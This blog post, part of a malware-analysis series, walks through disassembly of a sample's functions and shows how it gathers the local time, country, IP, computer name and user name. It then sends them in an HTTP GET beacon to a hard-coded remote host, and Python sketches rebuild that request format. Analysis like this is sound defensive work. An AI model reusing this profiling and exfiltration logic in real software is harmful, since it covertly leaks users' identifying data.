The Usefulness of Strings During Static Malware Analysis (part 4)

Examining a piece of malware for strings (sequences of printable characters) can reveal a few clues about what the malware does, or what it is capable of doing. Part three started disassembling the functions to see how closely their behaviour matched the predictions in part two, but sadly ended just as things were getting exciting. In part four, the saga continues.

Part three disassembled the _WinMain@16() function and saw that it called two other malware functions: sub_401eb0(), which downloaded a file before running it with CreateProcess(); and sub_401c40() which part three didn’t disassemble as it was getting quite long.

Part four continues by looking at three small ‘utility’ functions which are called by sub_401c40(), and then at sub_401c40() itself. I’ll look at the utility functions first so that they don’t interrupt the flow of the analysis of sub_401c40().

sub_401a70()

sub_401a70() referenced the following string:

%04d%02d%02d%02d%02d%02d

It uses the GetLocalTime() Win32 function, which stores the local time in a SYSTEMTIME structure. It then extracts the seconds, minutes, hour, day, month, and year from the SYSTEMTIME structure and pushes them on to the stack in that order. Finally, it calls _sprintf() with one of the format strings that we identified back in parts one and two, to format the time information according to the format string above:

.text:00401AC2                 push    offset a04d02d02d02d02 ; "%04d%02d%02d%02d%02d%02d"
.text:00401AC7                 push    ecx             ; char *
.text:00401AC8                 call    _sprintf

The ecx register has been loaded with the address that was passed as a parameter to sub_401a70(). The purpose of sub_401a70() then, is to return the local time, in the format ‘yyyyMMddhhmmss’ (year, month, date, hour, minutes, seconds). Basically it answers the question “What’s the time Mr. Wolf?”
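To make the output format concrete, here is a minimal Python sketch of what sub_401a70() appears to do. The function name format_timestamp() is my own invention; only the format string comes from the malware.

```python
from datetime import datetime

# The same format string that sub_401a70() passes to _sprintf().
TIMESTAMP_FORMAT = "%04d%02d%02d%02d%02d%02d"


def format_timestamp(now: datetime) -> str:
    """Format a local time as yyyyMMddhhmmss (hypothetical helper name)."""
    # The malware pushes seconds first and year last, so that year ends up
    # as the first value consumed by the format string.
    return TIMESTAMP_FORMAT % (
        now.year, now.month, now.day, now.hour, now.minute, now.second
    )


if __name__ == "__main__":
    # datetime.now() plays the role of GetLocalTime() here.
    print(format_timestamp(datetime.now()))
```

Every field is zero padded, so the result is always 14 characters long and sorts chronologically as plain text.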

sub_402090()

sub_402090() didn’t reference any strings, but it is called from sub_401c40() and so we’ll have a quick look at it. It calls gethostname() to obtain the local host’s host name. If this fails, sub_402090() returns 0.

Next up, in an interesting turn of events, it calls gethostbyname() to resolve the host name it just received to an IP address. After writing C code myself to determine the local host’s IP address, I suspect that the malware is using the combination of gethostname() and gethostbyname() as an easier alternative to calling GetAdaptersAddresses() and wading through its output. If gethostbyname() fails, sub_402090() returns 0.

sub_402090() then takes the first IP address returned by gethostbyname() (or, if there wasn’t one, returns 1 straight away) and passes it to inet_ntoa() to convert the four byte IP address in to a string (in the familiar dotted quad notation). It copies this IP address string in to the buffer passed as the first parameter to sub_402090(), and then returns 1.

It looks like sub_402090() is using gethostname(), followed by gethostbyname() to determine the local host’s IP address, and then calling inet_ntoa() to convert it to a string (the familiar dotted quad notation) — just the kind of thing that would make it easy to send in an HTTP query string.
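The same gethostname()/gethostbyname()/inet_ntoa() sequence can be sketched in Python using the standard socket module. This is only an approximation of the behaviour described above: the function name local_ip_string() and its two injectable parameters are my own assumptions (they make the sketch testable without a network), and it returns None where the malware returns 0.

```python
import socket


def local_ip_string(get_name=socket.gethostname,
                    resolve=socket.gethostbyname_ex):
    """Return this host's first IPv4 address as a dotted quad, or None."""
    try:
        host = get_name()                          # gethostname()
        _name, _aliases, addresses = resolve(host) # gethostbyname()
    except OSError:
        return None  # the malware returns 0 if either call fails
    if not addresses:
        # Simplification: this sketch just gives up when no address comes back.
        return None
    # Python already hands back strings; round trip through the packed
    # four byte form to mirror the inet_ntoa() step in the malware.
    packed = socket.inet_aton(addresses[0])
    return socket.inet_ntoa(packed)


if __name__ == "__main__":
    print(local_ip_string() or "NONE")
```

Note that on a machine with several interfaces, “first address returned” is not necessarily the address used to reach the Internet.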

sub_402100()

If I remember rightly, and I often don’t as I’m getting older so excuse me a moment while I look it up, sub_402100() was a function that only referenced a couple of short strings:

%20
%s%s

I suspected that this function may use those format strings in an sprintf() call to append two strings in a HTTP URL (as ‘%20’ is how a space character is encoded in URLs). This turned out to be incorrect, so let’s see what sub_402100() actually does.

.text:00402100 String2         = byte ptr -0C00h
.text:00402100 String1         = byte ptr -800h
.text:00402100 var_400         = dword ptr -400h
.text:00402100 lpString1       = dword ptr  4

This list, generated by IDA Pro, is suggesting that sub_402100() has three local variables (two strings, String1 and String2; and an unknown variable, var_400), and one parameter (lpString1) which is a pointer to a string.

The local variables are identified by the negative offsets in the above code, and the parameter by its positive offset. These offsets are typically offsets from either the stack pointer (esp register), as they are in this case, or from the frame pointer (ebp register).

After initialising some variables, it runs the following:

.text:00402126                 mov     eax, [esp+0C10h+lpString1]
.text:0040212D                 lea     ecx, [esp+0C10h+String2]
.text:00402131                 push    eax             ; lpString2
.text:00402132                 push    ecx             ; lpString1
.text:00402133                 call    ebp ; lstrcpyA

This block of instructions is using lstrcpy() to copy the ASCII string passed as a parameter (lpString1) to String2. A trailing ‘A’ in a Win32 function name indicates the ANSI version of the function, which operates on single byte (ASCII style) strings, rather than the wide character Unicode version, which is indicated by a trailing ‘W’. This is something which, until now, I have neglected to point out.

It gets a bit confusing because the comments added by IDA Pro are saying that ecx and eax are the lpString1 and lpString2 parameters to lstrcpyA(), as opposed to the String1, String2, and lpString1 variables that it defined previously.

If you read the instructions, you’ll see that eax contains the first parameter (that is the variable that IDA Pro previously identified as lpString1), and that ecx contains the address of (because of the use of the lea instruction, rather than the mov instruction) String2.

So, after all that, that block of code copies the string passed as a parameter, in to the local String2 variable.

.text:00402135                 lea     edx, [esp+0C10h+String2]
.text:00402139                 push    20h             ; int
.text:0040213B                 push    edx             ; char *
.text:0040213C                 call    _strchr
.text:00402141                 mov     esi, eax

It then calls the _strchr() function to search for the character with ASCII code 0x20 (which is a space character), in the string String2. Or, if you’d rather have that in English, it searches for a space in the string that was passed to it.

If it doesn’t find a space, it jumps down to the end of the function where it copies String2 back in to the buffer (string) that was passed to it as an argument, and returns. Hey, does this string make my buffer look big?

If it did find a space, it zeros the String1 and var_400 variables using repeat prefixes and store string instructions.

.text:00402182                 lea     eax, [esp+0C10h+String2]
.text:00402186                 lea     ecx, [esp+0C10h+String1]
.text:0040218D                 push    eax             ; lpString2
.text:0040218E                 push    ecx             ; lpString1
.text:0040218F                 mov     [esi], bl
.text:00402191                 call    ebp ; lstrcpyA

This time, the IDA Pro provided comments are correct. This block of code is using lstrcpy() to copy the ASCII string String2 to String1.

Believe it or not, the instruction at 0x40218f didn’t just wander in from the street, but is actually serving a purpose. The ebx register was set to zero using an ‘xor ebx,ebx’ instruction near the beginning of the function, and the bl register is the lower eight bits of the ebx register, hence it is also 0.

The return value from _strchr(), that is the address where the character was found, was saved in to the esi register immediately after the call to _strchr(). Hence the instruction at address 0x40218f is copying a null byte over the top of the space character that _strchr() found in String2. That is, it is terminating String2 at the first space character.

Excuse me a moment while I check how much is left of this function, as it is tea time and I’m getting hungry.

.text:00402193                 lea     edx, [esp+0C10h+String1]
.text:0040219A                 push    offset a20      ; "%20"
.text:0040219F                 push    edx             ; lpString1
.text:004021A0                 call    ds:lstrcatA

Right, sub_402100() then appends the string “%20” to the end of the local variable String1. The IDA Pro comment is saying that edx is the lpString1 parameter to lstrcat(), and not the lpString1 parameter passed as an argument to sub_402100(). This is why it is a good idea to give the generically named variables a more meaningful name once you figure out their purpose.

.text:004021A6                 inc     esi
.text:004021A7                 lea     eax, [esp+0C10h+var_400]
.text:004021AE                 push    esi             ; lpString2
.text:004021AF                 push    eax             ; lpString1
.text:004021B0                 call    ebp ; lstrcpyA

The next block of code increments the esi register which, if you remember, held the address of the space character in String2. That character is now a null byte, so after the inc instruction, esi points to the first character after the space character (or what is now the null byte) in String2.

It then uses lstrcpy() to copy from this post-space/post-null byte character, in to the local variable var_400. The net effect of this is that it has broken the input string in to two parts — the part before the first space character, which is now in String1 with the string ‘%20’ on the end of it, and the part after the first space character, which is now in var_400.

.text:004021B2                 mov     ecx, 100h
.text:004021B7                 xor     eax, eax
.text:004021B9                 lea     edi, [esp+0C10h+String2]
.text:004021BD                 lea     edx, [esp+0C10h+String1]
.text:004021C4                 rep stosd
.text:004021C6                 lea     ecx, [esp+0C10h+var_400]
.text:004021CD                 lea     eax, [esp+0C10h+String2]
.text:004021D1                 push    ecx
.text:004021D2                 push    edx
.text:004021D3                 push    offset aSS      ; "%s%s"
.text:004021D8                 push    eax             ; char *
.text:004021D9                 call    _sprintf

sub_402100() then uses a ‘rep stosd’ instruction to zero String2, before using _sprintf() and our good old ‘%s%s’ format string, to basically append the string in var_400 to the string in String1, and store the result in String2.

What this function has done, then, is search through the string that it is given, look for a space, and replace it with ‘%20’. ‘%20’ is how a space character is encoded in HTTP URLs… but wait, there’s more:

.text:004021DE                 lea     ecx, [esp+0C20h+String2]
.text:004021E2                 push    20h             ; int
.text:004021E4                 push    ecx             ; char *
.text:004021E5                 call    _strchr
.text:004021EA                 mov     esi, eax
.text:004021EC                 add     esp, 18h
.text:004021EF                 cmp     esi, ebx
.text:004021F1                 jnz     loc_40214E

It then calls _strchr() again to search for another space character in String2 and, if it finds one, jumps back to address 0x40214e to replace it with a ‘%20’. If it doesn’t find one, then we have the grand finale (I always thought that ‘finale’ should have an accent, but apparently not):

.text:004021F7                 mov     eax, [esp+0C10h+lpString1]
.text:004021FE                 lea     edx, [esp+0C10h+String2]
.text:00402202                 push    edx             ; lpString2
.text:00402203                 push    eax             ; lpString1
.text:00402204                 call    ebp ; lstrcpyA

It copies String2 back to the string that was passed in to the function — that is, it overwrites the original string. I told you it was ‘grand’.
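Putting the pieces together, the loop can be sketched in Python as follows. The function name encode_spaces() is mine, and the local variable names simply mirror the roles of IDA Pro’s String1, String2 and var_400. The sketch does not model the fixed size stack buffers that the real function uses.

```python
def encode_spaces(text: str) -> str:
    """Replace each space with '%20', one at a time (hypothetical name)."""
    string2 = text                       # working copy of the input string
    pos = string2.find(" ")              # _strchr(String2, 0x20)
    while pos != -1:
        string1 = string2[:pos] + "%20"  # text before the space, plus "%20"
        var_400 = string2[pos + 1:]      # text after the space
        # _sprintf(String2, "%s%s", String1, var_400)
        string2 = "%s%s" % (string1, var_400)
        pos = string2.find(" ")          # search again for the next space
    return string2                       # copied back over the caller's string


if __name__ == "__main__":
    print(encode_spaces("lg3=United States&lg5=MY PC"))
```

In Python the whole thing collapses to text.replace(" ", "%20"), but the longer form follows the disassembly step by step. Only spaces are encoded; other characters that are unsafe in a URL are left alone.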

Now that we know that function sub_402100() searches through the input string and replaces each occurrence of a space character with the string ‘%20’, I can have some dinner and finish off the star of this article, sub_401c40(), tomorrow.

As much as I’d like to finish it tonight, I have to be up at 04:30 in the morning — the early morning starts required for hot air ballooning here (at least if you want to be able to maintain what little control you have in a balloon), really don’t mix well with spending late nights wading through assembly language code and playing with I.T. stuff.

sub_401c40()

sub_401c40() starts off by initialising variables, before calling socket() to obtain an AF_INET (Internet address family, IPv4) SOCK_STREAM socket. The protocol is unspecified, which usually only leaves TCP as a protocol option in this case, but technically this could include SCTP.

If the socket() call returns -1 (to indicate an error), sub_401c40() returns 0.

.text:00401D0A                 push    80              ; hostshort
.text:00401D0C                 mov     [esp+0C38h+name.sa_family], AF_INET
.text:00401D13                 call    htons
.text:00401D18                 push    offset cp       ; "555.206.117.59"
.text:00401D1D                 mov     word ptr [esp+0C38h+name.sa_data], ax
.text:00401D22                 call    inet_addr

Here we see the malware calling htons() to convert 80 from host byte order (little endian on Intel 80x86 processors) to network byte order (big endian), before using the IP address string that we previously identified.

The IP address string is passed to the inet_addr() function to convert it from a string in to four bytes in network byte order, as they would appear in the header of an IP packet.

Scattered in amongst this code fragment, you see it setting name.sa_family to AF_INET, and name.sa_data to the contents of the ax register. Those of you who have done network programming may recognise these as being elements of a sockaddr structure.

Those two lines are initialising the address family to be AF_INET (Internet, that is IPv4), and the port (the first two bytes of sa_data when the address family is AF_INET) to be the value returned by htons(), that is, 80 in network byte order. 80/tcp (SOCK_STREAM socket type) is the well known port for HTTP, that is, web servers.

.text:00401D27                 lea     ecx, [esp+0C34h+name]
.text:00401D2B                 push    10h             ; namelen
.text:00401D2D                 push    ecx             ; name
.text:00401D2E                 push    esi             ; s
.text:00401D2F                 mov     dword ptr [esp+0C40h+name.sa_data+2], eax
.text:00401D33                 call    connect

There we have a connect() call — didn’t see that coming. The malware is building a sockaddr_in structure (sockaddr structure for the IPv4 address family) with a port number of 80. The return value from inet_addr(), which is still in the eax register, is placed at offset 2 of sockaddr.sa_data, that is sockaddr_in.sin_addr.
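For anyone who hasn’t met sockaddr_in before, the following Python sketch lays out the same 16 bytes (the 10h passed as namelen) by hand. The function name build_sockaddr_in() is my own, and the address in the example is a documentation address that I’ve assumed for illustration, not the one used by the malware.

```python
import socket
import struct

AF_INET = 2  # value of AF_INET in Winsock


def build_sockaddr_in(ip: str, port: int) -> bytes:
    """Lay out a sockaddr_in as it would sit in memory on x86."""
    family = struct.pack("<H", AF_INET)  # sa_family, little endian
    net_port = struct.pack("!H", port)   # bytes in memory after htons()
    net_addr = socket.inet_aton(ip)      # like inet_addr(): network order
    sin_zero = b"\x00" * 8               # unused padding
    return family + net_port + net_addr + sin_zero


if __name__ == "__main__":
    # 192.0.2.1 is an assumed example address.
    print(build_sockaddr_in("192.0.2.1", 80).hex())
```

The port occupies the first two bytes of sa_data and the address starts at offset 2 of sa_data, which matches the two mov instructions seen in the disassembly.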

The connect() call will hence connect to the remote host, 555.206.117.59, on port 80/tcp. If the connect call fails, it calls closesocket() and returns 0, otherwise, it calls sub_401a70() which as we’ve seen, returns the local time in ‘yyyyMMddhhmmss’ format (year, month, date, hour, minutes, seconds).

Rightio, this is where we get to confirm that data is leaked, and to see what data is leaked.

.text:00401D4F                 lea     edx, [esp+0C34h+dst]
.text:00401D56                 push    edx             ; dst
.text:00401D57                 call    sub_401a70

At this point, sub_401c40() starts gathering data. Here you can see it calling sub_401a70() with the address of (it’s an lea instruction not a mov instruction) the dst variable. As we have seen, this will return with the current time (yyyyMMddhhmmss) in the dst variable.

.text:00401D5F                 lea     eax, [esp+0C34h+LCData]
.text:00401D66                 push    edi             ; cchData
.text:00401D67                 push    eax             ; lpLCData
.text:00401D68                 push    LOCALE_SENGCOUNTRY ; LCType
.text:00401D6D                 push    LOCALE_SYSTEM_DEFAULT ; Locale
.text:00401D72                 call    ds:GetLocaleInfoA

Now it is calling GetLocaleInfo() with its LCType parameter set to LOCALE_SENGCOUNTRY, to find out what the full English name of the country/region is.

.text:00401D78                 lea     ecx, [esp+0C34h+nSize]
.text:00401D7C                 lea     edx, [esp+0C34h+Buffer]
.text:00401D80                 push    ecx             ; nSize
.text:00401D81                 push    edx             ; lpBuffer
.text:00401D82                 call    ds:GetComputerNameA

Reasonably self-explanatory. This will put the computer name in to the variable Buffer, which is nSize bytes large.

.text:00401D88                 lea     eax, [esp+0C34h+stAddrStr]
.text:00401D8C                 push    eax             ; lpstAddrStr
.text:00401D8D                 call    sub_402090

It then calls sub_402090() which obtains the computer’s IP address by using gethostname() to obtain its host name, and then resolving that to an IP address using gethostbyname().

.text:00401D95                 test    eax, eax
.text:00401D97                 jnz     short loc_401DA9
.text:00401D99                 lea     ecx, [esp+0C34h+stAddrStr]
.text:00401D9D                 push    offset aNone    ; "NONE"
.text:00401DA2                 push    ecx             ; lpString1
.text:00401DA3                 call    ds:lstrcpyA

If sub_402090() returned 0, then it copies the string “NONE” in to stAddrStr in place of the IP address.

.text:00401DA9                 lea     edx, [esp+0C34h+nSize]
.text:00401DAD                 lea     eax, [esp+0C34h+var_A00]
.text:00401DB4                 push    edx             ; nSize
.text:00401DB5                 push    eax             ; lpBuffer
.text:00401DB6                 mov     [esp+0C3Ch+nSize], edi
.text:00401DBA                 call    ds:GetUserNameA

Looks like it’s going to leak the current user’s user name too, as this code fragment is storing it in to var_A00.

The malware then uses ‘rep stosd’ followed by ‘stosw’ to zero a local variable.

.text:00401DD9                 lea     ecx, [esp+0C34h+buf]
.text:00401DE0                 push    offset aGetUpdataTpdb_ ; "GET /updata/TPDB.php?"
.text:00401DE5                 push    ecx             ; char *
.text:00401DE6                 stosb
.text:00401DE7                 call    _sprintf

Here we can see another of the strings being used. Given that we have just seen it connect to a remote host on port 80/tcp (well known port for HTTP), and that the string looks like a HTTP request, it is probably pretty safe to assume that it is now putting a HTTP request together.

The stosb instruction is part of the previous rep stosd/stosw code to zero a local variable. Compilers often interleave bits of code for performance reasons (CPU instruction pipelining for instance, where two or more independent instructions run in parallel).

.text:00401DEC                 mov     edx, [esp+0C3Ch+arg_0]
.text:00401DF3                 lea     eax, [esp+0C3Ch+var_A00]
.text:00401DFA                 push    edx
.text:00401DFB                 lea     ecx, [esp+0C40h+Buffer]
.text:00401DFF                 push    eax
.text:00401E00                 lea     edx, [esp+0C44h+stAddrStr]
.text:00401E04                 push    ecx
.text:00401E05                 lea     eax, [esp+0C48h+LCData]
.text:00401E0C                 push    edx
.text:00401E0D                 lea     ecx, [esp+0C4Ch+dst]
.text:00401E14                 push    eax
.text:00401E15                 push    ecx
.text:00401E16                 push    offset a1_003   ; "1.003"
.text:00401E1B                 lea     edx, [esp+0C58h+String2]
.text:00401E22                 push    offset aLg1SLg2SLg3S_0 ; "lg1=%s&lg2=%s&lg3=%s&lg4=%s&lg5=%s&lg6=%s&lg7=%d"
.text:00401E27                 push    edx             ; char *
.text:00401E28                 call    _sprintf

That big lump of code is just pushing the variables for the _sprintf() call on to the stack. This is where you get to work back to see what data is included in the HTTP query string (and hence leaked). This tells us that the query string will be (with the variable names in angled brackets):

lg1=1.003&lg2=<dst>&lg3=<LCData>&lg4=<stAddrStr>&lg5=<Buffer>&lg6=<var_A00>&lg7=<arg_0>

_sprintf() will store the resulting string in String2 (its first parameter). I’ll recap what data is contained in those variables later as part of the full HTTP request.
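Working back through the pushes is easier with the call written out in a higher level language. Here is a rough Python equivalent of that _sprintf() call. The function and parameter names are hypothetical, and the sample values are made up. C arguments are pushed right to left, so the last value pushed before the format string (“1.003”) fills the first ‘%s’.

```python
# The format string referenced by the push at 0x401e22.
QUERY_FORMAT = "lg1=%s&lg2=%s&lg3=%s&lg4=%s&lg5=%s&lg6=%s&lg7=%d"


def build_query(timestamp, country, ip, computer, user, arg_0):
    """Build the query string (function and parameter names are mine)."""
    return QUERY_FORMAT % (
        "1.003",    # constant string pushed at 0x401e16
        timestamp,  # dst
        country,    # LCData
        ip,         # stAddrStr
        computer,   # Buffer
        user,       # var_A00
        arg_0,      # integer argument passed to sub_401c40()
    )


if __name__ == "__main__":
    # All of these values are invented for the example.
    print(build_query("20120304050607", "United States",
                      "192.0.2.10", "PC01", "alice", 1))
```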

.text:00401E2D                 lea     eax, [esp+0C60h+String2]
.text:00401E34                 push    eax             ; lpString1
.text:00401E35                 call    sub_402100

Here it calls sub_402100() which, as we’ve seen, will percent encode any spaces in the String2 string.

.text:00401E3A                 mov     edi, ds:lstrcatA
.text:00401E40                 add     esp, 30h
.text:00401E43                 lea     ecx, [esp+0C34h+String2]
.text:00401E4A                 push    offset String2 ; " HTTP/1.1\r\nHost: [censored].jp\r\n\r\n"
.text:00401E4F                 push    ecx             ; lpString1
.text:00401E50                 call    edi ; lstrcatA

sub_401c40() then uses lstrcat() to add the protocol version to the request, and to also add a HTTP ‘Host:’ request header. The trailing ‘\r\n\r\n’ represents two new line sequences, which adds one blank line, which in turn signifies the end of the HTTP request headers. Hang in there — we’re almost at the end.

Notice that the preceding block of code has two String2s. The first is a variable, as indicated by the use of an offset from the esp register. The second is a string constant, as indicated by IDA Pro referencing it as ‘offset String2’ and commenting the instruction with the string’s value.

.text:00401E52                 lea     edx, [esp+0C34h+String2]
.text:00401E59                 lea     eax, [esp+0C34h+buf]
.text:00401E60                 push    edx             ; lpString2
.text:00401E61                 push    eax             ; lpString1
.text:00401E62                 call    edi ; lstrcatA

buf contains the start of the HTTP request (‘GET …’), and the variable String2 contains the query string and the rest of the HTTP request. This lstrcat() call will append the variable String2 to buf, thus leaving a complete HTTP request (with headers) in buf.

sub_401c40() then calculates the length of the data in buf (the complete HTTP request) and passes it, along with buf itself, to send() to send it to the remote host. It then calls closesocket() and returns 1 if the send() call succeeded, or 0 if it failed (send() returned -1). This also tells us that it is not expecting to receive any information back from the remote host and that this is simply a request to leak information and possibly to notify of infection.
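The order of those last few steps matters, so here is a small Python sketch of how the request appears to be assembled. The function name build_request() is my own, and the host name is left censored exactly as it is above.

```python
REQUEST_PREFIX = "GET /updata/TPDB.php?"
REQUEST_SUFFIX = " HTTP/1.1\r\nHost: [censored].jp\r\n\r\n"


def build_request(query: str) -> bytes:
    """Assemble the HTTP request from a query string (hypothetical name)."""
    # Effect of sub_402100(): spaces in the query become "%20".
    encoded = query.replace(" ", "%20")
    # First lstrcat(): the suffix is appended after encoding, so the
    # space in front of "HTTP/1.1" survives.
    tail = encoded + REQUEST_SUFFIX
    # Second lstrcat(): the result is appended to the "GET ..." prefix.
    request = REQUEST_PREFIX + tail
    return request.encode("ascii")


if __name__ == "__main__":
    print(build_request("lg1=1.003&lg3=United States").decode("ascii"))
```

Had the malware encoded the spaces after appending the protocol version and ‘Host:’ header, it would have mangled the request line.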

Summary

Well that certainly wasn’t short, but we now know what another four functions do:

sub_401a70()
Returns the local time in yyyyMMddhhmmss format.
sub_402090()
Returns the local host’s IP address as a string.
sub_402100()
Takes a string and percent encodes any spaces in it.
sub_401c40()
Issues a HTTP request to send information about the infected host.

sub_401c40() sends the following HTTP request:

GET /updata/TPDB.php?lg1=1.003&lg2=<dst>&lg3=<LCData>&lg4=<stAddrStr>&lg5=<Buffer>&lg6=<var_A00>&lg7=<arg_0> HTTP/1.1
Host: [censored].jp

Where:

1.003 looks like a version number
<dst> is the local time stamp
<LCData> is the English name of the country/region from the default locale settings
<stAddrStr> is the host’s IP address, or the string “NONE” if it couldn’t be determined
<Buffer> is the host’s computer name as reported by GetComputerName()
<var_A00> is the user name of the currently logged in user
<arg_0> is the argument passed to sub_401c40()
The query format string is telling us that this is an integer (the ‘%d’). Going back to the code, sub_401c40() is passed the return value from sub_401eb0(). In part three, we saw that this indicates whether or not the CreateProcess() call created the ACCl3.jpg process.
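If you come across one of these requests in a proxy log or packet capture, the fields are easy to pull back out. The following is a minimal sketch using Python’s standard urllib.parse module. The function name and the friendly field names are my own labels based on the list above, and the sample request line is invented.

```python
from urllib.parse import parse_qs, urlsplit

# My own labels for the lg1 to lg7 parameters, based on the analysis above.
FIELD_NAMES = {
    "lg1": "version",
    "lg2": "timestamp",
    "lg3": "country",
    "lg4": "ip_address",
    "lg5": "computer_name",
    "lg6": "user_name",
    "lg7": "process_created",
}


def decode_beacon(request_line: str) -> dict:
    """Extract the leaked fields from an HTTP request line."""
    target = request_line.split(" ")[1]  # the part between "GET" and "HTTP/1.1"
    values = parse_qs(urlsplit(target).query, keep_blank_values=True)
    # parse_qs() undoes the "%20" encoding and returns a list per key.
    return {FIELD_NAMES[key]: vals[0]
            for key, vals in values.items() if key in FIELD_NAMES}


if __name__ == "__main__":
    sample = ("GET /updata/TPDB.php?lg1=1.003&lg2=20120304050607"
              "&lg3=United%20States&lg4=192.0.2.10&lg5=PC01"
              "&lg6=alice&lg7=1 HTTP/1.1")
    for name, value in decode_beacon(sample).items():
        print(name, "=", value)
```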

There was one other function which referenced those strings, but which I haven’t covered: sub_401ae0(). From a quick look, it appears to be the same as sub_401c40(), except that it takes the values for query string variables lg1 to lg6 as arguments, and omits lg7. This could be used as a beacon from one of the 100 threads that are started.

The next part will look at some of the remaining functions, although I’m starting to think it won’t go in to as much detail! The remaining functions should be a tad more exciting, as they will be functions that are called from the thread function which starts running after infection.

Malware Musings

Thoughts on malware and malware analysis